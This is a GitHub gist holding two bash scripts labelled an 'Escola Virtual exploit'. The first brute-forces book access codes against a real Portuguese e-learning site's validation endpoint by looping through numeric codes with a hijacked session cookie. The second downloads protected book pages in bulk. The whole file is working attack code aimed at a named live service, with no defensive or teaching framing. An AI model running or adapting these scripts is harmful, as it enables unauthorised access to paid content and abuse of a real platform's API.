Created
June 9, 2017 23:29
-
-
Save ljmf00/f0bb4d40a5a90ec864dcf3196923480e to your computer and use it in GitHub Desktop.
Escola Virtual exploit that make a brute-force attack in the web API
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
INPUT_BOOK=1 | |
STR_BOOK_ID="00001" | |
INPUT_COOKIES="" #PHPSESSID Cookie ID | |
increment() | |
{ | |
((INPUT_BOOK++)) | |
if [ $INPUT_BOOK -lt 10 ] | |
then | |
STR_BOOK_ID="0000$INPUT_BOOK" | |
elif [ $INPUT_BOOK -gt 9 ] && [ $INPUT_BOOK -lt 100 ] | |
then | |
STR_BOOK_ID="000$INPUT_BOOK" | |
elif [ $INPUT_BOOK -gt 99 ] && [ $INPUT_BOOK -lt 1000 ] | |
then | |
STR_BOOK_ID="00$INPUT_BOOK" | |
elif [ $INPUT_BOOK -gt 999 ] && [ $INPUT_BOOK -lt 10000 ] | |
then | |
STR_BOOK_ID="0$INPUT_BOOK" | |
elif [ $INPUT_BOOK -gt 9999 ] | |
then | |
STR_BOOK_ID="$INPUT_BOOK" | |
else | |
STR_BOOK_ID="$INPUT_BOOK" | |
fi | |
} | |
while [ $INPUT_BOOK != 99999 ] | |
do | |
echo $STR_BOOK_ID | |
CMD="curl 'https://library.escolavirtual.pt/librarystudent/validateBookAccessCode' -H 'Host: library.escolavirtual.pt' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0' -H 'Accept: application/json, text/javascript, */*; q=0.01' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'DNT: 1' -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H 'X-Requested-With: XMLHttpRequest' -H 'Referer: https://library.escolavirtual.pt/librarystudent/empty' -H 'Cookie: PHPSESSID=$INPUT_COOKIES' -H 'Connection: keep-alive' --data 'accessCode=$STR_BOOK_ID.02'" | |
#echo $CMD | |
eval $CMD | |
echo "" | |
increment | |
done |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
INPUT_BOOK=1 | |
MAX_BOOK_PAGES=1 | |
STR_BOOK_ID="0001" | |
INPUT_COOKIES="" #PHPSESSID Cookie ID | |
BOOK_PUBLIC_PATH="" #Public Book Web-based Path | |
increment() | |
{ | |
((INPUT_BOOK++)) | |
if [ $INPUT_BOOK -lt 10 ] | |
then | |
STR_BOOK_ID="000$INPUT_BOOK" | |
elif [ $INPUT_BOOK -gt 9 ] && [ $INPUT_BOOK -lt 100 ] | |
then | |
STR_BOOK_ID="00$INPUT_BOOK" | |
elif [ $INPUT_BOOK -gt 99 ] && [ $INPUT_BOOK -lt 1000 ] | |
then | |
STR_BOOK_ID="0$INPUT_BOOK" | |
elif [ $INPUT_BOOK -gt 999 ] && [ $INPUT_BOOK -lt 10000 ] | |
then | |
STR_BOOK_ID="$INPUT_BOOK" | |
else | |
STR_BOOK_ID="$INPUT_BOOK" | |
fi | |
} | |
while [ $INPUT_BOOK != ($MAX_BOOK_PAGES + 1) ] | |
do | |
echo $STR_BOOK_ID | |
CMD="curl '$BOOK_PUBLIC_PATH/page$STR_BOOK_ID.svgz' -H 'Host: www.escolavirtual.pt' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'DNT: 1' -H 'Referer: $BOOK_PUBLIC_PATH/page$STR_BOOK_ID.xhtml' -H 'Cookie: ZDEDebuggerPresent=php,phtml,php3; PHPSESSID=$INPUT_COOKIES' -H 'Connection: keep-alive' -o book/$STR_BOOK_ID.svgz" | |
#echo $CMD | |
eval $CMD | |
echo "" | |
increment | |
done |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment